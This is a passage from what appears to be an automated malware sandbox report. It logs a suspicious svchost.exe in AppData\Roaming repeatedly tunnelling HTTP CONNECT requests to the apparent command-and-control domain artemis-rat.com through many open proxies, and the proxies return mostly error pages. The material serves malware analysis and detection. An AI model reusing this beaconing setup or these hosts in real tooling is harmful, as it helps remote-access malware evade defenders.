                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2330192.168.2.557220122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.806375980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2331192.168.2.557571104.20.24.2148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.811065912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.965230942 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2332192.168.2.557314139.129.162.65312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.814203024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.195379972 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/3.3.8
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 3556
                                                                                    X-Squid-Error: ERR_DNS_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;b


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2333192.168.2.55734639.108.229.14800243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.845618963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.178268909 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2334192.168.2.557350120.76.42.209888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.845710993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.187747955 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2335192.168.2.557354120.77.148.138808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.845868111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.186290979 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2336192.168.2.557593159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.846159935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2337192.168.2.55742837.187.91.1922198143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.846261978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.645726919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646212101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646228075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2338192.168.2.557510201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.846262932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.380331039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2339192.168.2.557418198.44.255.38043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.846318007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2340192.168.2.557398167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.846371889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2341192.168.2.557579172.67.253.698043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.846832037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.001451015 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2342192.168.2.55741441.111.243.188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.847141981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.160728931 CET495INHTTP/1.1 502 Proxy Error
                                                                                    Date: Sat, 09 Mar 2024 12:13:39 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 348
